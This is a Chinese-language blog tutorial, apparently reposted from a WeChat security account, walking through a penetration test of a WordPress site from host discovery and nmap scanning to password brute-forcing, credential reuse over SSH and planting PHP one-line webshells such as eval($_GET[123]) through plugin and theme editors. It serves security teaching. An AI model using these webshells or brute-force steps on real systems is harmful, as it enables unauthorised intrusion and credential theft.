一次很大众的渗透测试过程

admin 2024年12月9日10:29:34评论23 views字数 1791阅读5分58秒阅读模式

安全君呀设为"星标️"

第一时间收到文章更新

声明: 安全君呀 公众号文章中的技术只做研究之用,禁止用来从事非法用途,如有使用文章中的技术从事非法活动,一切后果由使用者自负,与本公众号无关。

文章声明:本篇文章内容部分选取网络,如有侵权,请告知删除。

一、发现主机

在网络渗透测试中,首先需要确定目标网络中的活跃主机。这可以通过使用多种工具来实现,例如:

  • arp-scan:用于扫描局域网内的ARP请求,以发现在线的主机。
  • netdiscover:通过被动监听网络流量来发现网络上的设备。
  • fping:发送ICMP ECHO_REQUEST包来发现网络上的主机。
一次很大众的渗透测试过程

二、端口扫描

发现主机后,下一步是扫描这些主机上开放的端口,以识别可能的攻击面。常用的工具包括:

  • nmap:一个强大的网络扫描工具,可以用于发现开放的端口、运行的服务及其版本。
一次很大众的渗透测试过程

三、目录扫描

在识别了开放端口后,可以对Web服务器进行目录扫描,以发现潜在的敏感目录或文件。Dirb是一个常用的工具:

  • Dirb:一个用于Web服务器目录枚举的工具,可以帮助发现隐藏的Web应用程序目录。
一次很大众的渗透测试过程

四、账号密码破解

一旦识别了登录页面,可以使用Burp Suite等工具来捕获登录请求,并尝试破解账号密码:

  • Burp Suite:一个集成的Web安全测试工具,可以用于拦截、修改和重放网络请求。
一次很大众的渗透测试过程

用户名在登陆页面得到认证,可以使用单个payload爆破密码:

一次很大众的渗透测试过程

五、上传WebShell

成功破解账号密码后,可以上传WebShell以维持对目标系统的控制。这可以通过以下方式实现:

  1. 插件上传

    • GET WebShell:通过构造特定的GET请求,将WebShell上传到目标服务器。
    • POST WebShell:通过构造POST请求,将WebShell上传到目标服务器。
    • GET一句话木马
      一次很大众的渗透测试过程
    • 一次很大众的渗透测试过程
    • POST一句话木马:

    • 一次很大众的渗透测试过程
    • 一次很大众的渗透测试过程
  2. 主题上传

    • 使用POST WebShell:通过WordPress等CMS的主题上传功能,上传包含WebShell的主题文件。
    • 保留WebShell:确保WebShell在上传后能够正常执行命令。
    • 使用Burp Suite执行命令:通过Burp Suite的Intruder功能,可以对WebShell发送命令。

使用POST一句话木马:

一次很大众的渗透测试过程

保留一句话木马:

一次很大众的渗透测试过程

BP执行命令:

一次很大众的渗透测试过程
一次很大众的渗透测试过程

使用GET一句话木马:

一次很大众的渗透测试过程

六、数据库连接

通过WebShell,可以连接到数据库并执行SQL查询:

  • 蚁剑:一个PHP开发的WebShell客户端,可以用于连接和操作数据库。
  • 查看数据库配置文件:通过WebShell访问数据库配置文件,获取数据库用户和密码。
  • 连接数据库:使用获取的凭据连接到数据库,并执行SQL查询。

蚁剑连接POST一句话木马:

一次很大众的渗透测试过程

查看数据库配置文件:

一次很大众的渗透测试过程

查看sql配置文件,找到用户密码,连接到数据库:

一次很大众的渗透测试过程

七、SSH远程登录

如果获得了SSH访问权限,可以进行远程登录:

  • SSH登录:使用获取的用户名和密码,通过SSH客户端远程登录到目标系统。
  • 登录成功:一旦登录成功,就可以执行更多的命令和操作。

考虑密码复用,ssh远程登录:

一次很大众的渗透测试过程
渗透测试过程:1、找 IP        arp-scan -l、netdiscover、fping        | arp-scan -l2、扫描端口    | nmap -p- IP3、扫描目录    | dirb http://IP4、账号密码爆破    | 从端口和目录浏览中发现wordpress登录页面,用户名在登陆页面得到认证,可以使用单个payload爆破密码5、写入一句话木马        在插件和主题处写入            GET一句话木马            | 找个php文件,写入            | <?php eval($_GET[123]);?>            | 找到该php文件的路径,在浏览器搜索框中输入            | ?123=system(id);            POST一句话木马            | php文件中写入:            | <?php eval($_POST[123]);?>            | 蚁剑连接,或者BP拦截,修改发送请求为POST,最后写上123=system(id);            | 发送6、连接SQL,密码复用    | 蚁剑连接POST一句话木马,查看数据库配置文件,找到用户和密码,使用蚁剑连接数据库。    | 考虑数据库密码复用,尝试ssh远程登录。
请注意,上述步骤描述的是渗透测试的基本流程,实际执行时需要遵循法律法规和道德规范,仅在授权的范围内进行测试。未经授权的渗透测试是非法的。

Tips

欢迎大家在下面点赞评论加关注,让我们一起在网安之路越走越远!!!

原文始发于微信公众号(安全君呀):一次很大众的渗透测试过程

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月9日10:29:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一次很大众的渗透测试过程https://cn-sec.com/archives/3484761.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息